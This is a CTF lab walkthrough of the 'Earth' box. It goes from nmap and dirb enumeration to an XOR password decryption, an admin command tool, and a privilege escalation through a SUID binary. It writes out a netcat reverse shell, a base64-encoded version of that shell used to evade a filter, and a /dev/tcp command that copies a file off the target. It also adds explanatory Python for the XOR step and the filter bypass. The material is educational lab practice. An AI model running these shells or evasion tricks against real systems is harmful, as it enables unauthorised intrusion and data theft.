Secuneus Labs – TryHackMe Walk-through : The Earth CTF Box
step 1 netdiscover -r 192.168.0.1/24 = (192.168.1.42). Use the netdiscover command to find all the hosts/IPs on your local network.
step 2 find open ports and see if there is any vulnerability
nmap 192.168.1.42. Use the nmap command to see which ports are open. You can see 3 ports are open (ssh, http, https).
Use “nmap -A 192.168.1.42” command to get all the info about the open ports.
Use “nmap -sV -O 192.168.1.42” to find the versions of the services on the open ports and the operating system version of the target. The OS version is reported as os-linux 4-5.
step 3 now see whether any of the nmap scripts in “/usr/share/nmap/scripts” cover a vulnerability on the open ports.
Use the commands “ls /usr/share/nmap/scripts | grep ssh” & “ls /usr/share/nmap/scripts | grep http” to list the scripts for the ssh and http protocols individually.
Now use “nmap -p 80 --script=http-vuln* 192.168.1.42” to see if any vulnerability is exploitable. We find no vulnerability which is exploitable.
step 4 as the http and https ports are open, some website must be running. So try browsing the IP of the target: browse http://192.168.1.40 or https://192.168.1.40. But an error message shows. It is a 400 error, which means that there is some problem on the client side.
step 5 so let’s enumerate the directories on the IP to see what problem we are facing: “dirb http://192.168.1.40/ /usr/share/wordlists/dirb/common.txt”
We found one directory, “http://192.168.1.42/cgi-bin/”, but found nothing in particular. So try the same with https, but still no useful information.
step 6 now, if the target has an https website running, it will definitely have an SSL certificate. So try to see it (click on the lock icon, then on connection not secure, then on more information, and then on view certificate).
We found that it has 2 DNS names: DNS=earth.local & subdomain=terratest.earth.local.
step 7 now lets see if this dns exists in the website file so f kali
As there is no such file, let’s add the DNS name and subdomain of the website to /etc/hosts with the commands “echo "192.168.1.42 earth.local" >> /etc/hosts” and “echo "192.168.1.42 terratest.earth.local" >> /etc/hosts”
Check that both names are added with the command “cat /etc/hosts”
step 8 now that the names are added, let’s browse earth.local and terratest.earth.local. A web page with some encrypted text and a message box appears in both cases.
step 9 now let’s use the dirb command again to find the directories, as there is a message column, which means that a login page must be there: “dirb http://earth.local”
We found the link to the admin page, so let’s see what it is. We found a login page with username & password fields. When we do dirb https://earth.local and dirb http://terratest.earth.local we find the same result,
but when we do dirb https://terratest.earth.local we find two new pages.
When we browse https://terratest.earth.local/index.html we find nothing,
but when we browse https://terratest.earth.local/robots.txt we find one suspicious file: Disallow: /testingnotes.*.
step 10 browse https://terratest.earth.local/testingnotes.txt. A message appears which states that the username is terra, the encryption method = XOR, and testdata.txt was used for encryption. But where is the encrypted data? See the first page of the website in step 8. There was some encrypted data on that page.
step 11 browse https://terratest.earth.local/testdata.txt to get the data used to decrypt.
browse https://gchq.github.io/CyberChef/ OR any other website to decrypt the data (use encryption method = XOR & put in the encryption key and the data to decrypt). The decrypted data is earthclimatechangebad4humans. It is a potential password to the login page. So log in using username=terra and password=earthclimatechangebad4humans.
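The XOR step from steps 10 and 11 written out, as an added example that is not part of the original walkthrough. The key text is a constructed stand-in for testdata.txt, the message is assumed to be hex-encoded and to hold a repeated secret, and the function names are illustrative; it shows why publishing the key file next to the ciphertext leaves no confidentiality.

```python
from itertools import cycle

# Constructed stand-in for the key file; the real testdata.txt is not reproduced here.
KEY_TEXT = b"Constructed stand-in for the key file testdata.txt; the real file is not shown here."
# Value the walkthrough reports as the decryption result.
SECRET = "earthclimatechangebad4humans"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key if it is shorter than the data."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def smallest_period(text: str) -> str:
    """Shortest prefix that reproduces text when repeated (last repeat may be cut)."""
    for n in range(1, len(text) + 1):
        unit = text[:n]
        if (unit * (len(text) // n + 1))[:len(text)] == text:
            return unit
    return text


def make_sample_hex() -> str:
    """Build a constructed hex message: the secret repeated, XORed with the key text."""
    repeats = len(KEY_TEXT) // len(SECRET) + 1
    plaintext = (SECRET * repeats)[:len(KEY_TEXT)].encode("ascii")
    return xor_bytes(plaintext, KEY_TEXT).hex()


def recover(hex_message: str, key: bytes) -> str:
    """XOR is its own inverse: applying the same key again yields the plaintext."""
    plaintext = xor_bytes(bytes.fromhex(hex_message), key).decode("ascii")
    return smallest_period(plaintext)


if __name__ == "__main__":
    message = make_sample_hex()
    print("hex message :", message[:48] + "...")
    print("recovered   :", recover(message, KEY_TEXT))
```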
step 12 after login, Admin Command Tool is opened
step 13 let’s start by executing ls command
step 14 now check the operating system of the target using “uname -a” and see if we could find something to exploit it, but nothing is found (linux earth 5.12).
step 15 now check which directory you are in using the pwd command. You are in the root directory. So now let’s start checking all the directories for clues.
We find a clue in the var directory named earth_web. Use the commands “ls /var” and “ls /var/earth_web”. Here we found our user flag.
step 16 use the command “cat /var/earth_web/user_flag” to display the content of user_flag.txt. You got your first flag.
Now to find the root flag we need root access, so we will try to get remote access to the server.
step 17 use the command “echo $SHELL” to check the current shell. You can see that you are in sbin shell.
Now let’s check all the shells available on the server using the command “cat /etc/shells”. These are needed to run netcat commands so that kali can listen for the target to get remote access.
step 18 run command “nc -lnvp 4444” in kali to listen to the target.
Now use the command “nc -e /bin/bash 192.168.1.92 4444” on the server command line to connect the earth server to kali. But it does not work, as remote connection is not allowed.
step 19 so let’s try to encode the command and use it again. Use “echo nc -e /bin/bash 192.168.1.92 4444 | base64” to base64-encode the command.
Now make the earth server run this encoded command using “echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMS45MiA0NDQ0Cg== | base64 -d | bash”. The server will need to decode it first and then execute it in the bash shell.
You do not get anything on the command line page, but on the kali terminal you have remote access to the target.
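Why the check in step 18 stopped the plain command but not the encoded one in step 19, shown from the filter's side as an added example (not code from the box or the original walkthrough). The denylist rule, rejecting commands that contain an IPv4 literal, is an assumption made for illustration, and all function names are hypothetical.

```python
import base64
import binascii
import re

# Hypothetical denylist rule (assumption): reject commands containing an IPv4 literal.
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Runs of the base64 alphabet long enough to hide a short command.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_layers(command, max_depth=3):
    """Return the command plus every ASCII payload found by decoding base64 tokens in it."""
    layers, queue = [], [(command, 0)]
    while queue:
        text, depth = queue.pop()
        if text in layers:
            continue
        layers.append(text)
        if depth == max_depth:
            continue
        for token in B64_TOKEN.findall(text):
            try:
                payload = base64.b64decode(token, validate=True).decode("ascii")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not valid base64, or not text
            queue.append((payload, depth + 1))
    return layers


def raw_filter_blocks(command):
    """Denylist applied to the submitted string only."""
    return IPV4.search(command) is not None


def layered_filter_blocks(command):
    """Same denylist applied to the string and to everything it decodes to."""
    return any(IPV4.search(layer) for layer in decoded_layers(command))


# Commands quoted in steps 18 and 19 of the walkthrough.
PLAIN = "nc -e /bin/bash 192.168.1.92 4444"
ENCODED = "echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMS45MiA0NDQ0Cg== | base64 -d | bash"

if __name__ == "__main__":
    for cmd in (PLAIN, ENCODED, "ls /var/earth_web"):
        print(raw_filter_blocks(cmd), layered_filter_blocks(cmd), cmd)
```

Decoding before matching closes only this one gap; a web form that hands its input to a shell is still command execution by design.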
step 20 now confirm with the command “whoami”. The result will be apache, which means remote access is successful.
Now we need to find weak files which run with root permission. Find those files using the command “find / -perm -u=s -type f 2>/dev/null”. You will see different files which have root access, so try to exploit these files to get root access.
step 21 we see one file which may be vulnerable. Let’s run the command “/usr/bin/reset_root”. On execution the server does not allow us to do anything.
step 22 so we will send this file to kali and check what the error is. Use the command “nc -lnvp 3333 > reset_root” in kali to receive the copy of the file.
To send the file from the target, use the command “cat /usr/bin/reset_root > /dev/tcp/192.168.1.92/3333” (execute it in the remote session to send the file).
But before that, use the command “python3 -c 'import pty;pty.spawn("/bin/bash")'” to make our access interactive.
Now run “cat /usr/bin/reset_root > /dev/tcp/192.168.1.92/3333”
step 23 we will get this file in kali. Now execute the “ls” command to see the file.
Read the file using the command “cat reset_root” (you will see that the content of the file is not readable to us, so we will use the ltrace tool).
“ltrace ./reset_root” (first-time users will have to install this tool; after installing, run it again)
But it shows permission denied, so give the file executable permission with the command “chmod +x reset_root”. Now run the command “ltrace ./reset_root” (it shows that our remotely accessed server is missing 3 files, so use the touch command to create these files on the remotely accessed server).
step 24 use the following commands to create the missing files
“touch /dev/shm/kHgTFI5G”
“touch /dev/shm/Zw7bV9U5”
“touch /tmp/kcM0Wewe”
Use the command “reset_root” to reset the password (the root password is reset to earth).
step 25 so let’s change to the root account by using the command “su root”. Fill in the password… root access is gained.
step 26 use “pwd” to see where you are. You are in the root directory. Now use the command “cd root” to get into /root. Do “ls” to view the contents. You will find the root_flag.txt file; use the command “cat root_flag.txt” to read the file. The root flag is obtained.
This CTF walkthrough was created by Nishtha Kumari